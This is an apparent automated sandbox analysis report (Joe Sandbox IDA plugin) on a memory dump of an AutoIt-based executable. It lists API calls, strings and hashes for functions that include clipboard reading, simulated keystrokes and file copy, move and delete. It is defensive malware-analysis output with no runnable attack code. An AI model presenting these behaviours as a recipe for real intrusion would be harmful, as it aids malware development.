Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 0d5384795d0a7520538504f9f17320dcf3853bd6f9e6f6516f37a841ca89e122
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 08B092B284030C77CE112A86EC02B993B1A9B50660F008020FB0C18162AA73AAA09A89

Function 006950EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,006950BE,?,00695088,?,0069BE3D,007522E8,?,00000000,?,00693E2E,?,00000000,?), ref: 0069510C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d148fbbc734aa1b5ca6028dc102aff4a3f1a6b5f73dcfc9e95ccd2cb3473e4b8
Instruction ID: 52ae6025cafac9ebcf289982b5332ade9ea033487f6a2f62c48b2c29a6ad0736
Opcode Fuzzy Hash: d148fbbc734aa1b5ca6028dc102aff4a3f1a6b5f73dcfc9e95ccd2cb3473e4b8
Instruction Fuzzy Hash: 28E0BF75400B02DBC6324F1AE804452FBF9FFD13613218A2FD5E642A60D7705446DF54

Non-executed Functions

Function 006FF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 006FF64E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006FF6AD
GetWindowLongW.USER32(?,000000F0), ref: 006FF6EA
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006FF711
SendMessageW.USER32 ref: 006FF737
_wcsncpy.LIBCMT ref: 006FF7A3
GetKeyState.USER32(00000011), ref: 006FF7C4
GetKeyState.USER32(00000009), ref: 006FF7D1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006FF7E7
GetKeyState.USER32(00000010), ref: 006FF7F1
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006FF820
SendMessageW.USER32 ref: 006FF843
SendMessageW.USER32(?,00001030,?,006FDE69), ref: 006FF940
SetCapture.USER32(?), ref: 006FF970
ClientToScreen.USER32(?,?), ref: 006FF9D4
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 006FF9FA
ReleaseCapture.USER32 ref: 006FFA05
GetCursorPos.USER32(?), ref: 006FFA3A
ScreenToClient.USER32(?,?), ref: 006FFA47
SendMessageW.USER32(?,00001012,00000000,?), ref: 006FFAA9
SendMessageW.USER32 ref: 006FFAD3
SendMessageW.USER32(?,00001111,00000000,?), ref: 006FFB12
SendMessageW.USER32 ref: 006FFB3D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006FFB55
SendMessageW.USER32(?,0000110B,00000009,?), ref: 006FFB60
GetCursorPos.USER32(?), ref: 006FFB81
ScreenToClient.USER32(?,?), ref: 006FFB8E
GetParent.USER32(?), ref: 006FFBAA
SendMessageW.USER32(?,00001012,00000000,?), ref: 006FFC10
SendMessageW.USER32 ref: 006FFC40
ClientToScreen.USER32(?,?), ref: 006FFC96
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006FFCC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 006FFCEA
SendMessageW.USER32 ref: 006FFD0D
ClientToScreen.USER32(?,?), ref: 006FFD57
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006FFD87
GetWindowLongW.USER32(?,000000F0), ref: 006FFE1C

Strings

F, xrefs: 006FFD13
@GUI_DRAGID, xrefs: 006FF99D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3461372671-4164748364
Opcode ID: ff1ca0da107467247fed5476105d8735582df8809fee8996f6701c61ae36f377
Instruction ID: 19b7a49e45150f34f16d28ab6cbf71dcdbb4cc3b204ff9da0b629bb7445b15ac
Opcode Fuzzy Hash: ff1ca0da107467247fed5476105d8735582df8809fee8996f6701c61ae36f377
Instruction Fuzzy Hash: 9E32AB70204209AFDB20DF68C884ABABBE6FF48354F148A29F655C72B1DB75EC05CB55

Function 006FA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 006FAFDB

Strings

%d/%02d/%02d, xrefs: 006FAD0A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: ccec0a3ce7a0151e0670849eeb2071e11372fdc6d516d632cdf37480eb7f174e
Instruction ID: 53cf638e3aba482ebc5cbcde26af84d4cdb0fc0283e6501fd9dddebacbc96750
Opcode Fuzzy Hash: ccec0a3ce7a0151e0670849eeb2071e11372fdc6d516d632cdf37480eb7f174e
Instruction Fuzzy Hash: 0A12CFB1505208ABEB258FA8CC89FFE7BBAEF45350F108219F619DB2D1DB748941CB15

Function 006AF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 006AF796
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00704388
IsIconic.USER32(000000FF), ref: 00704391
ShowWindow.USER32(000000FF,00000009), ref: 0070439E
SetForegroundWindow.USER32(000000FF), ref: 007043A8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007043BE
GetCurrentThreadId.KERNEL32 ref: 007043C5
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007043D1
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007043E2
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007043EA
AttachThreadInput.USER32(00000000,?,00000001), ref: 007043F2
SetForegroundWindow.USER32(000000FF), ref: 007043F5
MapVirtualKeyW.USER32(00000012,00000000), ref: 0070440A
keybd_event.USER32(00000012,00000000), ref: 00704415
MapVirtualKeyW.USER32(00000012,00000000), ref: 0070441F
keybd_event.USER32(00000012,00000000), ref: 00704424
MapVirtualKeyW.USER32(00000012,00000000), ref: 0070442D
keybd_event.USER32(00000012,00000000), ref: 00704432
MapVirtualKeyW.USER32(00000012,00000000), ref: 0070443C
keybd_event.USER32(00000012,00000000), ref: 00704441
SetForegroundWindow.USER32(000000FF), ref: 00704444
AttachThreadInput.USER32(000000FF,?,00000000), ref: 0070446B

Strings

Shell_TrayWnd, xrefs: 00704383

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7cff747db204d17c2d8ee85bc38a48db73da5e3311d7d02ca19eb559224a8c50
Instruction ID: f1b6f4310c03467168d44141cd0b107344103b3929d38b4d37186e3170e77a3f
Opcode Fuzzy Hash: 7cff747db204d17c2d8ee85bc38a48db73da5e3311d7d02ca19eb559224a8c50
Instruction Fuzzy Hash: 5431B4B1A40218BBEB306B759C49FBF7EADEB44B50F11C015FB04EA1D0C6B85D10AEA4

Function 0069BDF0 Relevance: 39.1, APIs: 12, Strings: 10, Instructions: 643COMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,007522E8,?,00000000,?,00693E2E,?,00000000,?,0072DBF0,00000000,?), ref: 0069BE8B
GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00693E2E,?,00000000,?,0072DBF0,00000000,?,00000002), ref: 0069BEA7
__wsplitpath.LIBCMT ref: 0069BF19

Part of subcall function 006B297D: __wsplitpath_helper.LIBCMT ref: 006B29BD

_wcscpy.LIBCMT ref: 0069BF31
_wcscat.LIBCMT ref: 0069BF46
SetCurrentDirectoryW.KERNEL32(?), ref: 0069BF56
_wcscpy.LIBCMT ref: 0069C03E
_wcscpy.LIBCMT ref: 0069C1ED
SetCurrentDirectoryW.KERNEL32 ref: 0069C250

Part of subcall function 006B010A: std::exception::exception.LIBCMT ref: 006B013E
Part of subcall function 006B010A: __CxxThrowException@8.LIBCMT ref: 006B0153

Part of subcall function 0069C320: _memmove.LIBCMT ref: 0069C419

Strings

Bad directive syntax error, xrefs: 0070393E
Unterminated string, xrefs: 007039E1
>>>AUTOIT SCRIPT<<<, xrefs: 00703611
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00703577
AU3!, xrefs: 0069BEE0
"u, xrefs: 0069C207
_, xrefs: 0069C281
Error opening the file, xrefs: 00703593, 00703639
G-i, xrefs: 0070366E, 007036A8
EA06, xrefs: 007035AA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$G-i$Unterminated string$_$"u
API String ID: 2542276039-3165233961
Opcode ID: 16144111b4202730eaf836439ea3fd88f1b01d7e2afb899e52d5540e25e8bf70
Instruction ID: 0e7112fe4f6451e3139cf0967e6c53c52f6db9fe5a547dcf52d7953f45720b06
Opcode Fuzzy Hash: 16144111b4202730eaf836439ea3fd88f1b01d7e2afb899e52d5540e25e8bf70
Instruction Fuzzy Hash: 1A429FB1508341DFDB50EF64C851BABB7EAAF84310F00492DF58687292DB35EA49CB97

Function 006D6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 006931DA

Part of subcall function 006D7B9F: __wsplitpath.LIBCMT ref: 006D7BBC
Part of subcall function 006D7B9F: __wsplitpath.LIBCMT ref: 006D7BCF

Part of subcall function 006D7C0C: GetFileAttributesW.KERNEL32(?,006D6A7B), ref: 006D7C0D

_wcscat.LIBCMT ref: 006D6B9D
_wcscat.LIBCMT ref: 006D6BBB
__wsplitpath.LIBCMT ref: 006D6BE2
FindFirstFileW.KERNEL32(?,?), ref: 006D6BF8
_wcscpy.LIBCMT ref: 006D6C57
_wcscat.LIBCMT ref: 006D6C6A
_wcscat.LIBCMT ref: 006D6C7D
lstrcmpiW.KERNEL32(?,?), ref: 006D6CAB
DeleteFileW.KERNEL32(?), ref: 006D6CBC
MoveFileW.KERNEL32(?,?), ref: 006D6CDB
MoveFileW.KERNEL32(?,?), ref: 006D6CEA
CopyFileW.KERNEL32(?,?,00000000), ref: 006D6CFF
DeleteFileW.KERNEL32(?), ref: 006D6D10
FindNextFileW.KERNEL32(00000000,00000010), ref: 006D6D37
FindClose.KERNEL32(00000000), ref: 006D6D53
FindClose.KERNEL32(00000000), ref: 006D6D61

Strings

\*.*, xrefs: 006D6B8C, 006D6B9B, 006D6BB9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
String ID: \*.*
API String ID: 1867810238-1173974218
Opcode ID: 990e4a6f54c967cb4061256205a48126ff2b4592d33d01f736d619301456857f
Instruction ID: c23ae0ea866aa2ef26bc074f7d15f1298941379bc97b92191c5ab19cb4951456
Opcode Fuzzy Hash: 990e4a6f54c967cb4061256205a48126ff2b4592d33d01f736d619301456857f
Instruction Fuzzy Hash: 07514372D0016CAACB21EBA4DC44EEE777EAF09300F4445DBE55993241EB349B89CF65

Function 006E7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0072DBF0), ref: 006E70C3
IsClipboardFormatAvailable.USER32(0000000D), ref: 006E70D1
GetClipboardData.USER32(0000000D), ref: 006E70D9
CloseClipboard.USER32 ref: 006E70E5
GlobalLock.KERNEL32(00000000), ref: 006E7101
CloseClipboard.USER32 ref: 006E710B
GlobalUnlock.KERNEL32(00000000), ref: 006E7120
IsClipboardFormatAvailable.USER32(00000001), ref: 006E712D
GetClipboardData.USER32(00000001), ref: 006E7135
GlobalLock.KERNEL32(00000000), ref: 006E7142
GlobalUnlock.KERNEL32(00000000), ref: 006E7176
CloseClipboard.USER32 ref: 006E7283

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 1a96d72c5dfdca07df16508fcb1a2bfd1b0ea92ae3ef49be0156e1119cda83de
Instruction ID: 1c7fa4ab495169db278f3eca345e2b7aab31282d308c04047738c67789f9728a
Opcode Fuzzy Hash: 1a96d72c5dfdca07df16508fcb1a2bfd1b0ea92ae3ef49be0156e1119cda83de
Instruction Fuzzy Hash: 8351E131208345AFD720EF65DC86FAE73AAAF84B01F00851DF646D22D1EB74DD058B6A

Function 006E2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 006E2065
_wcscmp.LIBCMT ref: 006E207A
_wcscmp.LIBCMT ref: 006E2091
GetFileAttributesW.KERNEL32(?), ref: 006E20A3
SetFileAttributesW.KERNEL32(?,?), ref: 006E20BD
FindNextFileW.KERNEL32(00000000,?), ref: 006E20D5
FindClose.KERNEL32(00000000), ref: 006E20E0
FindFirstFileW.KERNEL32(*.*,?), ref: 006E20FC
_wcscmp.LIBCMT ref: 006E2123
_wcscmp.LIBCMT ref: 006E213A
SetCurrentDirectoryW.KERNEL32(?), ref: 006E214C
SetCurrentDirectoryW.KERNEL32(00743A68), ref: 006E216A
FindNextFileW.KERNEL32(00000000,00000010), ref: 006E2174
FindClose.KERNEL32(00000000), ref: 006E2181
FindClose.KERNEL32(00000000), ref: 006E2191

Strings

*.*, xrefs: 006E20F7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 44ed217a41deac347f670d998001d851ce3b6432e0c08d696e3b8268102a4c33
Instruction ID: f97332e05a4739d2ca3466794a5c34c39079e43d2ebdd85defafa4bc4624ea36
Opcode Fuzzy Hash: 44ed217a41deac347f670d998001d851ce3b6432e0c08d696e3b8268102a4c33
Instruction Fuzzy Hash: 2E31C37160135A7ACB249BA5DC69EDE73AE9F05320F108056FA14E21D0DB78DF84CF69

Function 006FF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

DragQueryPoint.SHELL32(?,?), ref: 006FF14B

Part of subcall function 006FD5EE: ClientToScreen.USER32(?,?), ref: 006FD617
Part of subcall function 006FD5EE: GetWindowRect.USER32(?,?), ref: 006FD68D
Part of subcall function 006FD5EE: PtInRect.USER32(?,?,006FEB2C), ref: 006FD69D

SendMessageW.USER32(?,000000B0,?,?), ref: 006FF1B4
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006FF1BF
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006FF1E2
_wcscat.LIBCMT ref: 006FF212
SendMessageW.USER32(?,000000C2,00000001,?), ref: 006FF229
SendMessageW.USER32(?,000000B0,?,?), ref: 006FF242
SendMessageW.USER32(?,000000B1,?,?), ref: 006FF259
SendMessageW.USER32(?,000000B1,?,?), ref: 006FF27B
DragFinish.SHELL32(?), ref: 006FF282
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 006FF36D

Strings

@GUI_DROPID, xrefs: 006FF2A2
@GUI_DRAGFILE, xrefs: 006FF31C
@GUI_DRAGID, xrefs: 006FF2E1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: 4144879fb5ea38144f3d56233ccf5a43bfde99c250e84d06a3cdb6a509ac4758
Instruction ID: a690065d4d99bf0b8eee015186dc676029f87f5d4684215199e8ddb4c1e089e6
Opcode Fuzzy Hash: 4144879fb5ea38144f3d56233ccf5a43bfde99c250e84d06a3cdb6a509ac4758
Instruction Fuzzy Hash: 22616A72408304AFC710EF64DC85EABBBF9BF89750F004A2DF695921A1DB749A05CB56

Function 006E219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 006E21C0
_wcscmp.LIBCMT ref: 006E21D5
_wcscmp.LIBCMT ref: 006E21EC

Part of subcall function 006D7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006D7621

FindNextFileW.KERNEL32(00000000,?), ref: 006E221B
FindClose.KERNEL32(00000000), ref: 006E2226
FindFirstFileW.KERNEL32(*.*,?), ref: 006E2242
_wcscmp.LIBCMT ref: 006E2269
_wcscmp.LIBCMT ref: 006E2280
SetCurrentDirectoryW.KERNEL32(?), ref: 006E2292
SetCurrentDirectoryW.KERNEL32(00743A68), ref: 006E22B0
FindNextFileW.KERNEL32(00000000,00000010), ref: 006E22BA
FindClose.KERNEL32(00000000), ref: 006E22C7
FindClose.KERNEL32(00000000), ref: 006E22D7

Strings

*.*, xrefs: 006E223D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 399595367b230c2aa2717f314f479323111422decd7d4745c191487e9178834d
Instruction ID: 0f0de0167452fefde87204e2a2da967a77405158ea4767515b06c268d69cefcd
Opcode Fuzzy Hash: 399595367b230c2aa2717f314f479323111422decd7d4745c191487e9178834d
Instruction Fuzzy Hash: E131D27190235A7ECB20ABA5EC69EDE73AE9F05320F108155EA14A21D0DB34DF85CA69

Function 006FECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006FED0C
GetFocus.USER32 ref: 006FED1C
GetDlgCtrlID.USER32(00000000), ref: 006FED27
_memset.LIBCMT ref: 006FEE52
GetMenuItemInfoW.USER32 ref: 006FEE7D
GetMenuItemCount.USER32(00000000), ref: 006FEE9D
GetMenuItemID.USER32(?,00000000), ref: 006FEEB0
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 006FEEE4
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 006FEF2C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006FEF64
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 006FEF99

Strings

0, xrefs: 006FEE4A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

